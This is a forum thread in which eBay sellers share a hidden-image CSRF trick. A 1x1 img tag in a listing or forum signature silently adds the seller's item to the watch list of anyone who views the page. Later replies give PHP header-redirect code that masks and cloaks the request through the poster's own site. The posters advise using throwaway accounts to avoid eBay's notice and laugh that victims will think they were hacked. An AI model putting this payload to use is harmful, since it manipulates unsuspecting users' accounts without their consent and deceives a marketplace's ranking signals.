For all you ebayers out there, here's the one line code to get people on your watch list. Put it in your listing or your ebay forum signature and see it do the trick :p

I've used this method to get my products on the watch lists of a whole lot of people. Be very careful while using it since there's a very real chance of getting noticed and pissing off a lot of people ... lol

Code: 
<img src="http://cgi1.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=MakeTrack&item=ITEMNUMBER&ssPageName=VIP:watchlink:middle:us" height=1 width=1 border=0 />
Replace the ITEMNUMBER with the item number of the item you want watched.

Use this as your signature on the forum (get this cloaked or masked) and I guarantee that within an hour you'll get over 100 people on your watch list if you are a little active on the forum. I also guarantee you that a lot of people will be getting pissed about this :D

The best part you'll find is the kind of discussion this will trigger. I've seen a few and people get really paranoid thinking that their account has been hacked.... lol

Quick question on this. I want to use .htaccess redirect with this where the img tag inserted into the auction would go to one of my sites. When the img is called, I'll .htaccess redirect to the script posted above.

What I was wondering is if there is a way to make the img tag in the auction pass the item number so that I can just call the nonexistent "watchthis.gif" for all my auctions instead of having to call watchthis1.gif 2.gif and so on for each auction with the item # "hard coded".
 
yeah.. pass the id in a get request

ie:

Code: 
<img src="yoursite.com/watch.gif?id=2342342">

then your rewrite to a php script would use

$_GET['id'];

header("Location: http://cgi1.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=MakeTrack&item=".$_GET['id']."&ssPageName=VIP:watchlink:middle:us" );

That was by no means complete code, it was just a rough example. But yeah , It would be easier to have the redirect go to one script.. :)

And for all those of you implementing this, I say again, it's gonna attract a lot of attention to your ebay id. Use a junk one if you are doing this for fun. Also, using the item id as a parameter in the URL would give away your item id just by looking at the source. And because so many people would get on to your watchlist, you can expect the dreaded email from ebay very soon that your account is a security risk to the ebay community ..
 
it breaks the iframe. can any one give exact code for this in php or .htacess
